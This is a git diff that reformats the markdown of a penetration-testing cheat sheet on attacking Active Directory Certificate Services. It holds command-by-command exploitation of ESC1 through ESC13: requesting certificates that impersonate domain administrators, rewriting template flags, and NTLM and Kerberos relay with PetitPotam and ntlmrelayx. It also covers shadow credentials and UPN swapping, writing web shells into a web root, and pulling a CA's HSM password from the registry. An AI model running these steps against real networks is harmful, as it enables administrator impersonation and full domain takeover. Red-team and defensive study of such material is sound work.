Fix markdown syntax
parent
ea7e265dac
commit
a98066199a
|
@ -2,25 +2,22 @@
|
||||||
|
|
||||||
Active Directory Certificate Services (AD CS) is a Microsoft Windows server role that provides a public key infrastructure (PKI). It allows you to create, manage, and distribute digital certificates, which are used to secure communication and transactions across a network.
|
Active Directory Certificate Services (AD CS) is a Microsoft Windows server role that provides a public key infrastructure (PKI). It allows you to create, manage, and distribute digital certificates, which are used to secure communication and transactions across a network.
|
||||||
|
|
||||||
|
|
||||||
## ADCS Enumeration
|
## ADCS Enumeration
|
||||||
|
|
||||||
* netexec: `netexec ldap domain.lab -u username -p password -M adcs`
|
* netexec: `netexec ldap domain.lab -u username -p password -M adcs`
|
||||||
* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
|
* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
|
||||||
* certutil: `certutil.exe -config - -ping`, `certutil -dump`
|
* certutil: `certutil.exe -config - -ping`, `certutil -dump`
|
||||||
|
|
||||||
|
|
||||||
## Certificate Enrollment
|
## Certificate Enrollment
|
||||||
|
|
||||||
* DNS required (`CT_FLAG_SUBJECT_ALT_REQUIRE_DNS` or `CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS`): only principals with their `dNSHostName` attribute set can enroll.
|
* DNS required (`CT_FLAG_SUBJECT_ALT_REQUIRE_DNS` or `CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS`): only principals with their `dNSHostName` attribute set can enroll.
|
||||||
* Active Directory Users cannot enroll in certificate templates requiring `dNSHostName`.
|
* Active Directory Users cannot enroll in certificate templates requiring `dNSHostName`.
|
||||||
* Computers will get their `dNSHostName` attribute set when you **domain-join** a computer, but the attribute is null if you simply create a computer object in AD.
|
* Computers will get their `dNSHostName` attribute set when you **domain-join** a computer, but the attribute is null if you simply create a computer object in AD.
|
||||||
* Computers have validated write to their `dNSHostName` attribute meaning they can add a DNS name matching their computer name.
|
* Computers have validated write to their `dNSHostName` attribute meaning they can add a DNS name matching their computer name.
|
||||||
|
|
||||||
* Email required (`CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL` or `CT_FLAG_SUBJECT_REQUIRE_EMAIL`): only principals with their `mail` attribute set can enroll unless the template is of schema version 1.
|
* Email required (`CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL` or `CT_FLAG_SUBJECT_REQUIRE_EMAIL`): only principals with their `mail` attribute set can enroll unless the template is of schema version 1.
|
||||||
* By default, users and computers do not have their `mail` attribute set, and they cannot modify this attribute themselves.
|
* By default, users and computers do not have their `mail` attribute set, and they cannot modify this attribute themselves.
|
||||||
* Users might have the `mail` attribute set, but it is rare for computers.
|
* Users might have the `mail` attribute set, but it is rare for computers.
|
||||||
|
|
||||||
|
|
||||||
## ESC1 - Misconfigured Certificate Templates
|
## ESC1 - Misconfigured Certificate Templates
|
||||||
|
|
||||||
|
@ -32,10 +29,10 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
|
||||||
* **ENROLLEE_SUPPLIES_SUBJECT** flag
|
* **ENROLLEE_SUPPLIES_SUBJECT** flag
|
||||||
* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)
|
* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)
|
||||||
|
|
||||||
|
|
||||||
**Exploitation**
|
**Exploitation**
|
||||||
|
|
||||||
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
|
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe find /vulnerable
|
Certify.exe find /vulnerable
|
||||||
Certify.exe find /vulnerable /currentuser
|
Certify.exe find /vulnerable /currentuser
|
||||||
|
@ -46,18 +43,24 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
|
||||||
# or
|
# or
|
||||||
python bloodyAD.py -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=lab,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))'
|
python bloodyAD.py -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=lab,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))'
|
||||||
```
|
```
|
||||||
|
|
||||||
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
||||||
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
||||||
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
||||||
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
|
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
|
||||||
```
|
```
|
||||||
|
|
||||||
* Use OpenSSL and convert the certificate, do not enter a password
|
* Use OpenSSL and convert the certificate, do not enter a password
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
|
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
|
||||||
```
|
```
|
||||||
|
|
||||||
* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
|
* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
|
Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
|
||||||
```
|
```
|
||||||
|
@ -66,7 +69,6 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
|
||||||
|
|
||||||
**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
|
**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
|
||||||
|
|
||||||
|
|
||||||
## ESC2 - Misconfigured Certificate Templates
|
## ESC2 - Misconfigured Certificate Templates
|
||||||
|
|
||||||
**Requirements**
|
**Requirements**
|
||||||
|
@ -76,45 +78,53 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
|
||||||
**Exploitation**
|
**Exploitation**
|
||||||
|
|
||||||
* Find template
|
* Find template
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
|
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
|
||||||
# or
|
# or
|
||||||
python bloodyAD.py -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=megacorp,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))'
|
python bloodyAD.py -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=megacorp,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))'
|
||||||
```
|
```
|
||||||
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
|
||||||
|
|
||||||
|
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
||||||
|
|
||||||
## ESC3 - Misconfigured Enrollment Agent Templates
|
## ESC3 - Misconfigured Enrollment Agent Templates
|
||||||
|
|
||||||
> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
|
> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
|
||||||
|
|
||||||
* Request a certificate based on the vulnerable certificate template ESC3.
|
* Request a certificate based on the vulnerable certificate template ESC3.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
|
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
|
||||||
[*] Saved certificate and private key to 'john.pfx'
|
[*] Saved certificate and private key to 'john.pfx'
|
||||||
```
|
```
|
||||||
* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
|
|
||||||
```ps1
|
|
||||||
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
|
|
||||||
```
|
|
||||||
|
|
||||||
|
* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
|
||||||
|
```
|
||||||
|
|
||||||
## ESC4 - Access Control Vulnerabilities
|
## ESC4 - Access Control Vulnerabilities
|
||||||
|
|
||||||
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
||||||
|
|
||||||
* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
|
* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
|
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
|
||||||
```
|
```
|
||||||
|
|
||||||
* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
|
* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
|
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
|
||||||
|
|
||||||
# Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template.
|
# Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template.
|
||||||
C:\>StandIn.exe --adcs --filter WebServer --ess --add
|
C:\>StandIn.exe --adcs --filter WebServer --ess --add
|
||||||
```
|
```
|
||||||
|
|
||||||
* Perform ESC1 and then restore the value
|
* Perform ESC1 and then restore the value
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
||||||
```
|
```
|
||||||
|
@ -130,7 +140,6 @@ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'E
|
||||||
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
|
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC5 - Vulnerable PKI Object Access Control
|
## ESC5 - Vulnerable PKI Object Access Control
|
||||||
|
|
||||||
> Escalate the privileges from **Domain Administrator** in the child domain into **Enterprise Administrator** at the forest root.
|
> Escalate the privileges from **Domain Administrator** in the child domain into **Enterprise Administrator** at the forest root.
|
||||||
|
@ -154,7 +163,6 @@ certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe06709
|
||||||
* Publish by adding the template to the list in `certificateTemplate` property of `CN=Services`>`CN=Public Key Services`>`CN=Enrollment Services`>`pkiEnrollmentService`
|
* Publish by adding the template to the list in `certificateTemplate` property of `CN=Services`>`CN=Public Key Services`>`CN=Enrollment Services`>`pkiEnrollmentService`
|
||||||
* Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.
|
* Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.
|
||||||
|
|
||||||
|
|
||||||
## ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
## ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||||
|
|
||||||
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
||||||
|
@ -162,10 +170,13 @@ certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe06709
|
||||||
**Exploitation**
|
**Exploitation**
|
||||||
|
|
||||||
* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
|
* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe cas
|
Certify.exe cas
|
||||||
```
|
```
|
||||||
|
|
||||||
* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
|
* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
.\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
|
.\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
|
||||||
```
|
```
|
||||||
|
@ -174,24 +185,30 @@ certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe06709
|
||||||
|
|
||||||
* Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
|
* Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
|
||||||
|
|
||||||
|
|
||||||
## ESC7 - Vulnerable Certificate Authority Access Control
|
## ESC7 - Vulnerable Certificate Authority Access Control
|
||||||
|
|
||||||
**Exploitation**
|
**Exploitation**
|
||||||
|
|
||||||
* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
|
* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe find /vulnerable
|
Certify.exe find /vulnerable
|
||||||
```
|
```
|
||||||
|
|
||||||
* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
|
* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe setconfig /enablesan /restart
|
Certify.exe setconfig /enablesan /restart
|
||||||
```
|
```
|
||||||
|
|
||||||
* Request the certificate with the desired SAN.
|
* Request the certificate with the desired SAN.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe request /template:User /altname:super.adm
|
Certify.exe request /template:User /altname:super.adm
|
||||||
```
|
```
|
||||||
|
|
||||||
* Grant approval if required or disable the approval requirement
|
* Grant approval if required or disable the approval requirement
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Grant
|
# Grant
|
||||||
Certify.exe issue /id:[REQUEST ID]
|
Certify.exe issue /id:[REQUEST ID]
|
||||||
|
@ -215,7 +232,6 @@ Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
|
||||||
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
|
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC8 - AD CS Relay Attack
|
## ESC8 - AD CS Relay Attack
|
||||||
|
|
||||||
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
|
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
|
||||||
|
@ -223,6 +239,7 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
|
||||||
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
||||||
|
|
||||||
* **Version 1**: NTLM Relay + Rubeus + PetitPotam
|
* **Version 1**: NTLM Relay + Rubeus + PetitPotam
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
||||||
|
@ -246,6 +263,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Version 2**: NTLM Relay + Mimikatz + Kekeo
|
* **Version 2**: NTLM Relay + Mimikatz + Kekeo
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||||
|
|
||||||
|
@ -261,6 +279,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Version 3**: Kerberos Relay
|
* **Version 3**: Kerberos Relay
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Setup the relay
|
# Setup the relay
|
||||||
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
|
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
|
||||||
|
@ -270,6 +289,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
|
* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
https://github.com/bats3c/ADCSPwn
|
https://github.com/bats3c/ADCSPwn
|
||||||
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
||||||
|
@ -291,11 +311,11 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Version 5**: Certipy ESC8
|
* **Version 5**: Certipy ESC8
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy relay -ca 172.16.19.100
|
certipy relay -ca 172.16.19.100
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC9 - No Security Extension
|
## ESC9 - No Security Extension
|
||||||
|
|
||||||
**Requirements**
|
**Requirements**
|
||||||
|
@ -307,34 +327,42 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
|
|
||||||
**Scenario**
|
**Scenario**
|
||||||
|
|
||||||
John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local.
|
<John@corp.local> has **GenericWrite** over <Jane@corp.local>, and we want to compromise <Administrator@corp.local>.
|
||||||
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
|
<Jane@corp.local> is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
|
||||||
|
|
||||||
* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
|
* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
|
certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
|
||||||
```
|
```
|
||||||
|
|
||||||
* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
|
* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
|
certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
|
||||||
```
|
```
|
||||||
|
|
||||||
* Request the vulnerable certificate template ESC9 from Jane's account.
|
* Request the vulnerable certificate template ESC9 from Jane's account.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
|
certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
|
||||||
# userPrincipalName in the certificate is Administrator
|
# userPrincipalName in the certificate is Administrator
|
||||||
# the issued certificate contains no "object SID"
|
# the issued certificate contains no "object SID"
|
||||||
```
|
```
|
||||||
* Restore userPrincipalName of Jane to Jane@corp.local.
|
|
||||||
|
* Restore userPrincipalName of Jane to <Jane@corp.local>.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
|
certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
|
||||||
```
|
```
|
||||||
* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.
|
|
||||||
|
* Authenticate with the certificate and receive the NT hash of the <Administrator@corp.local> user.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certipy auth -pfx administrator.pfx -domain corp.local
|
certipy auth -pfx administrator.pfx -domain corp.local
|
||||||
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
|
# Add -domain <domain> to your command line since there is no domain specified in the certificate.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC11 - Relaying NTLM to ICPR
|
## ESC11 - Relaying NTLM to ICPR
|
||||||
|
|
||||||
> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue.
|
> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue.
|
||||||
|
@ -348,11 +376,11 @@ Exploitation:
|
||||||
|
|
||||||
1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output
|
1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output
|
||||||
2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
|
2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
|
ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ESC12 - ADCS CA on YubiHSM
|
## ESC12 - ADCS CA on YubiHSM
|
||||||
|
|
||||||
The ESC12 vulnerability occurs when a Certificate Authority (CA) stores its private key on a YubiHSM2 device, which requires an authentication key (password) to access. This password is stored in the registry in cleartext, allowing an attacker with shell access to the CA server to recover the private key.
|
The ESC12 vulnerability occurs when a Certificate Authority (CA) stores its private key on a YubiHSM2 device, which requires an authentication key (password) to access. This password is stored in the registry in cleartext, allowing an attacker with shell access to the CA server to recover the private key.
|
||||||
|
@ -360,17 +388,19 @@ The ESC12 vulnerability occurs when a Certificate Authority (CA) stores its priv
|
||||||
Unlocking the YubiHSM with the plaintext password in the registry key: `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`.
|
Unlocking the YubiHSM with the plaintext password in the registry key: `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`.
|
||||||
|
|
||||||
* Importing the CA certificate into the user store
|
* Importing the CA certificate into the user store
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certutil -addstore -user my <CA certificate file>
|
certutil -addstore -user my <CA certificate file>
|
||||||
```
|
```
|
||||||
|
|
||||||
* Associated with the private key in the YubiHSM2 device
|
* Associated with the private key in the YubiHSM2 device
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common Name>
|
certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common Name>
|
||||||
```
|
```
|
||||||
|
|
||||||
* Finally use `certutil -sign ...`
|
* Finally use `certutil -sign ...`
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## ESC13 - Issuance Policy
|
## ESC13 - Issuance Policy
|
||||||
|
|
||||||
